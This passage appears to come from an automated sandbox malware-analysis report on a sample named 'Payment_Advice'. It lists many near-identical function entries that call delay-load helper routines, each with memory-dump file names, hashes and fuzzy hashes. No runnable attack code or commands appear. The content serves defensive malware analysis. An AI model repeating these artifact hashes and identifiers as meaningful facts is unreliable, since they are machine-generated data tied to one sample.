                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: c0e466547fea7025509c8ac3c3510460ce548305894511de9a5e226570b01f55
                                                                                                    • Instruction ID: 5bad1e12a893a58c0487441948fdc6a9072287219f02220e92903c9140319eb1
                                                                                                    • Opcode Fuzzy Hash: c0e466547fea7025509c8ac3c3510460ce548305894511de9a5e226570b01f55
                                                                                                    • Instruction Fuzzy Hash: A0B012F5298001BC321451151D0BCB70ECCF4C2B10730443EFC06C2080DC506DC34531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E2B4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 64d75098faa350a264ca4ef68e46456e8a199c3ca54616163eceb4b17126f9ec
                                                                                                    • Instruction ID: 1ab5a3ba847742a53dee2997fbcdd5b6b2542b5c461fd2043b2f948adb45dbaa
                                                                                                    • Opcode Fuzzy Hash: 64d75098faa350a264ca4ef68e46456e8a199c3ca54616163eceb4b17126f9ec
                                                                                                    • Instruction Fuzzy Hash: 69B012E5298001BC321451155C0BCF70E4CF4C2B10330483EFC06C20C0D8506C824531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: (Q
                                                                                                    • API String ID: 1269201914-982174220
                                                                                                    • Opcode ID: a28208e013271a5ab066f1ce1e945e8f8af0941dfb60797f29cd8ff4a6b969cb
                                                                                                    • Instruction ID: 384d580720536c458eabb9d62dd21b44398fb2f1b5a4bad166f055dde481dd3b
                                                                                                    • Opcode Fuzzy Hash: a28208e013271a5ab066f1ce1e945e8f8af0941dfb60797f29cd8ff4a6b969cb
                                                                                                    • Instruction Fuzzy Hash: A8B012D12581017C3304520C5C0FC7F0E5DF4C1F20330462EFC04C1080F9400CCA0631
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: (Q
                                                                                                    • API String ID: 1269201914-982174220
                                                                                                    • Opcode ID: 102e6c8bd5d964202d85397b0c4c0600f505c3bb58103d5e3b15498fef279dd1
                                                                                                    • Instruction ID: 8ecb05370b9ee4b97d56e7f7892030b7e8e7a765df67a891f2afe4793ca95dab
                                                                                                    • Opcode Fuzzy Hash: 102e6c8bd5d964202d85397b0c4c0600f505c3bb58103d5e3b15498fef279dd1
                                                                                                    • Instruction Fuzzy Hash: 69B012E125C0017C320412281C0FC7F0E0DF4C1F20730543EFC10D04C1B9400D8A0531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E53C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: (Q
                                                                                                    • API String ID: 1269201914-982174220
                                                                                                    • Opcode ID: 2e2058d4fc799fc04c97a45818e45f93b7520e72a0fcb3e2b1cad2c1fed61193
                                                                                                    • Instruction ID: d07639e87e373bab5986571af49475234fc641869047851e3ee75bedde6fefd7
                                                                                                    • Opcode Fuzzy Hash: 2e2058d4fc799fc04c97a45818e45f93b7520e72a0fcb3e2b1cad2c1fed61193
                                                                                                    • Instruction Fuzzy Hash: 05B012D1658001BC3204920C5C0FC7F0F5DF4C5F20330852EFC04C1080F9404C860631
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E528 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E51F
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: (Q
                                                                                                    • API String ID: 1269201914-982174220
                                                                                                    • Opcode ID: ba685e92d53da3c6016589c9f56446b14ca6f214655d56dd3865532bc0b299b1
                                                                                                    • Instruction ID: 0289a0ff10d8d32a8d6fd719b2e693be48e669da978286ef03dbfe208c18dc66
                                                                                                    • Opcode Fuzzy Hash: ba685e92d53da3c6016589c9f56446b14ca6f214655d56dd3865532bc0b299b1
                                                                                                    • Instruction Fuzzy Hash: A3B012D12580417C3244520C1D0BC7F0E4DF4C1F20330842EFC04C1080F9400C870631
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E580
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: FvnQ
                                                                                                    • API String ID: 1269201914-3908200080
                                                                                                    • Opcode ID: edbb96d7f344e0838edce2cd95fccc59dfa235146c2a3d2eaffb13433e4221ac
                                                                                                    • Instruction ID: 52a7335371a060eb442a6f4d58525651013481ab64af98f7d12e969e17493030
                                                                                                    • Opcode Fuzzy Hash: edbb96d7f344e0838edce2cd95fccc59dfa235146c2a3d2eaffb13433e4221ac
                                                                                                    • Instruction Fuzzy Hash: D9B012D16591017D3244A1581C07C7B0E8DF4C1B10331442EFC04C2080E8500C820531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E580
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: FvnQ
                                                                                                    • API String ID: 1269201914-3908200080
                                                                                                    • Opcode ID: f09d8e8f62443e99bc7cf7081e1c9c43a7a5809830f617eff222e2857eafd6da
                                                                                                    • Instruction ID: f39c82a2866d712456f794a39836473f5a67fed648a9be4f96a14d22be800a96
                                                                                                    • Opcode Fuzzy Hash: f09d8e8f62443e99bc7cf7081e1c9c43a7a5809830f617eff222e2857eafd6da
                                                                                                    • Instruction Fuzzy Hash: 6AB012E16582017D3244A1585C07C7B0EADF4C1B10331462EFC04C2080E8400CC20531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E580
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: FvnQ
                                                                                                    • API String ID: 1269201914-3908200080
                                                                                                    • Opcode ID: 9c5faa4e6545e3b78c9f62bfc2f85352e77bed2f4bde53d174e22d454e88ad5f
                                                                                                    • Instruction ID: bdd937751aa5b4fb497b535f85f411053e568b8a313c4aca544118b33a9002e7
                                                                                                    • Opcode Fuzzy Hash: 9c5faa4e6545e3b78c9f62bfc2f85352e77bed2f4bde53d174e22d454e88ad5f
                                                                                                    • Instruction Fuzzy Hash: 80B012E16581017C3204A1585D07C7B4EADF4C1B10371462EFC04C2080EC400D830531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E25F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: e79f5ecbc0742461898dd6528af2eab18a8408183d4ce3ae649ac009c8e35488
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: e79f5ecbc0742461898dd6528af2eab18a8408183d4ce3ae649ac009c8e35488
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E27D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: ab01764e80feffea34cab7183cc176e49019d1ed60cfdf285aaa725e3c0a906a
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: ab01764e80feffea34cab7183cc176e49019d1ed60cfdf285aaa725e3c0a906a
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E219 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: d4a4c04d996de001eb491cf6563a5f48a29e5f569089b6b8adccc3d7a84ecc21
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: d4a4c04d996de001eb491cf6563a5f48a29e5f569089b6b8adccc3d7a84ecc21
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: e545a77cfbb902f967d8588c6301e8d603fa9df60d1f7889228616cd367a9e8b
                                                                                                    • Instruction ID: 57443957aa994ddf51618c6ab4adb63bfd46b8364081013a22d4c7ac4f8f571a
                                                                                                    • Opcode Fuzzy Hash: e545a77cfbb902f967d8588c6301e8d603fa9df60d1f7889228616cd367a9e8b
                                                                                                    • Instruction Fuzzy Hash: AAA011EA2A8002BC300822222C0BCBB0E0CF8C2B20330882EFC03C0080A88028820830
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
